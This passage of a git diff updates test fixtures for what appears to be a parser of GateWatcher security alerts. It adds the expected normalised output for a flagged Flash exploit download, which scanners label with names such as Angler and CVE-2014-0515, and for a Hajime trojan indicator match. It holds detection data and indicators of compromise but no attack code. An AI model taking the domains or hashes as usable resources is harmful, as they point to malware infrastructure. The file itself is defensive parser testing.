14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 (B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}"
   },
   "expected": {
-    "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 (B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}"
+    "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 (B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}",
+    "event": {
+      "category": [
+        "malware"
+      ],
+      "module": "malware",
+      "severity": 1,
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-03-22T10:53:13.408000Z",
+    "destination": {
+      "address": "2.2.2.2",
+      "ip": "2.2.2.2",
+      "port": 19609
+    },
+    "file": {
+      "hash": {
+        "md5": "67ca9a31f220bc7b68f203c07ad668b9",
+        "sha256": "350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4"
+      },
+      "name": "/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust",
+      "size": 77068
+    },
+    "gatewatcher": {
+      "event_type": "malware",
+      "fileinfo": "{\"file_id\": 379, \"filename\": \"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\", \"gaps\": false, \"magic\": \"Macromedia Flash data (compressed), version 14\", \"md5\": \"67ca9a31f220bc7b68f203c07ad668b9\", \"sha256\": \"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\", \"sid\": [1100020], \"size\": 77068, \"state\": \"CLOSED\", \"stored\": true, \"tx_id\": 1}",
+      "filemagic": "Macromedia Flash data (compressed), version 14",
+      "flow_id": "1910314914537014",
+      "gcap": "gcap-xxxxxxxx.domain.local",
+      "gcenter": "gcenter-xxxxxxxx.domain.local",
+      "malcore": {
+        "code": "1",
+        "detail_threat_found": "Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF"
+      },
+      "reporting_token": "No GBOX",
+      "state": "Infected",
+      "timestamp_analyzed": "2023-03-22T10:53:13.408Z",
+      "timestamp_detected": "2023-03-22T10:35:22.615Z",
+      "type": "malcore"
+    },
+    "http": {
+      "request": {
+        "method": "GET"
+      },
+      "response": {
+        "status_code": 200
+      }
+    },
+    "network": {
+      "protocol": "http",
+      "transport": "TCP"
+    },
+    "observer": {
+      "hostname": "gcap-xxxxxxxxx.domain.local",
+      "name": "gcap-xxxxxxxx.domain.local",
+      "type": "ids",
+      "version": "0.2"
+    },
+    "related": {
+      "hash": [
+        "350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4",
+        "67ca9a31f220bc7b68f203c07ad668b9"
+      ],
+      "hosts": [
+        "gcap-xxxxxxxxx.domain.local",
+        "tsevid-synonymi.justdanceatsea.com"
+      ],
+      "ip": [
+        "1.1.1.1",
+        "2.2.2.2"
+      ]
+    },
+    "source": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "port": 8080
+    },
+    "url": {
+      "domain": "tsevid-synonymi.justdanceatsea.com",
+      "path": "/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust",
+      "registered_domain": "justdanceatsea.com",
+      "subdomain": "tsevid-synonymi",
+      "top_level_domain": "com"
+    },
+    "user_agent": {
+      "device": {
+        "name": "Other"
+      },
+      "name": "IE",
+      "original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
+      "os": {
+        "name": "Windows",
+        "version": "7"
+      },
+      "version": "8.0"
+    }
   }
 }
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json
index 39f436f31..d42b439ac 100644
--- a/GateWatcher/aioniq/tests/retrohunt.json
+++ b/GateWatcher/aioniq/tests/retrohunt.json
@@ -9,6 +9,100 @@
     "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}"
   },
   "expected": {
-    "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}"
+    "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a 